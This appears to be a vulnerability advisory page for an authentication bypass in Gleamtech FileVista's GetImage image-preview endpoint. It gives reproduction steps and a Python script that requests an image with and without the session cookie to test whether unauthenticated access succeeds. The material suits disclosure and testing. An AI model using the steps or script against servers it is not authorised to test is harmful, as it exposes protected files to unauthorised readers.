Gleamtech FileVista Incorrect Access Control Vulnerability in Image Preview Function

Vulnerability

Gleamtech FileVista version 9.2.0.0 serves files through its image preview endpoint without checking on the server side that the request carries a valid authenticated session. Because the server does not enforce this check, a remote attacker can simply strip the authentication-related HTTP headers (in particular the Cookie header that carries the session) from the request and still retrieve image files that should only be available after login.

Impact

An unauthenticated remote attacker who knows or can guess the name of an image file hosted by FileVista can retrieve it directly, bypassing the login that normally protects it. The advisory describes read access to image files only; no other file types or operations are claimed.

Reproduction

To reproduce, send a GET request to the filemanager.ashx/GetImage endpoint (relative to the FileVista application root) with the fileName query parameter set to the name of the image to retrieve, and omit the Cookie header so that no session accompanies the request. A web browser with cookies cleared or a tool such as cURL works equally well; the essential step is that no authentication-related header is sent. On an affected server the image is returned as if the caller were logged in, whereas a server that enforces authentication should refuse the request (for example with a 401 or 403) or redirect it to the login page.
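
The two-request check below is an added example written for this page; it is not code from the advisory or from Gleamtech. It sends the GetImage request once with the session cookie and once with the Cookie header removed, as described above, and classifies the unauthenticated response. The application mount path inside BASE_URL, the cookie string (whatever the browser sent for the logged-in session), and the status codes a protected server answers with are assumptions, not details taken from the advisory.

```python
"""Check whether a FileVista GetImage endpoint serves images without a session.

Added example for this page; not part of the original advisory and not
Gleamtech code. Assumed (not stated on the page): the application mount
path in BASE_URL, the cookie string the browser sent, and that a protected
server answers an unauthenticated request with 401/403, a redirect to the
login page, or a non-image body.
"""
import sys
import urllib.error
import urllib.parse
import urllib.request

GETIMAGE_PATH = "filemanager.ashx/GetImage"  # endpoint named in the advisory


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: a 302 to the login page is itself the signal."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def build_getimage_request(base_url, file_name, cookie=None):
    """Build the GET request from the advisory.

    The fileName value is URL-encoded as a query parameter. The Cookie
    header is attached only when a cookie string is supplied, so
    cookie=None reproduces the 'remove the Cookie header' step exactly.
    """
    base = base_url.rstrip("/") + "/"  # keep the mount path when joining
    query = urllib.parse.urlencode({"fileName": file_name})
    url = urllib.parse.urljoin(base, GETIMAGE_PATH) + "?" + query
    headers = {"User-Agent": "filevista-getimage-check"}
    if cookie:
        headers["Cookie"] = cookie
    return urllib.request.Request(url, headers=headers, method="GET")


def send(request, timeout=10):
    """Return (status, content_type, body_length); never raise on 3xx/4xx/5xx."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(request, timeout=timeout) as resp:
            body = resp.read()
            return resp.status, resp.headers.get("Content-Type", "") or "", len(body)
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Content-Type", "") or "", 0


def classify(status, content_type, body_len):
    """Interpret the response to the request sent WITHOUT the Cookie header."""
    ctype = (content_type or "").lower()
    if status == 200 and ctype.startswith("image/") and body_len > 0:
        return "vulnerable"      # image bytes served with no session at all
    if status in (401, 403) or 300 <= status < 400:
        return "protected"       # refused, or bounced to the login page
    if status == 200:
        return "not_served"      # 200 but not an image (error or login HTML)
    return "inconclusive"        # 404, 5xx, etc.: wrong file name or server issue


def probe(base_url, file_name, cookie):
    """Send the request with the session cookie, then again without it."""
    with_cookie = send(build_getimage_request(base_url, file_name, cookie))
    without_cookie = send(build_getimage_request(base_url, file_name, None))
    return {
        "with_cookie": with_cookie,
        "without_cookie": without_cookie,
        "verdict": classify(*without_cookie),
    }


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit("usage: getimage_check.py BASE_URL FILE_NAME 'name=value; ...'")
    result = probe(sys.argv[1], sys.argv[2], sys.argv[3])
    for key, value in result.items():
        print(f"{key}: {value}")
```

The authenticated request is the baseline: if it does not itself return an image, the file name is wrong (or the cookie has expired) and the unauthenticated result says nothing about the server. Redirects are deliberately not followed, because a 302 to the login page is exactly the "protected" answer the check is looking for and would otherwise be collapsed into a 200 HTML page.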

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm
spread: 1.0
impact: 2.5
exploitability: 9.7
remediation: 0.0
relevance: 0.0
threat: 6.4
urgency: 2.9
incentive: 10.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.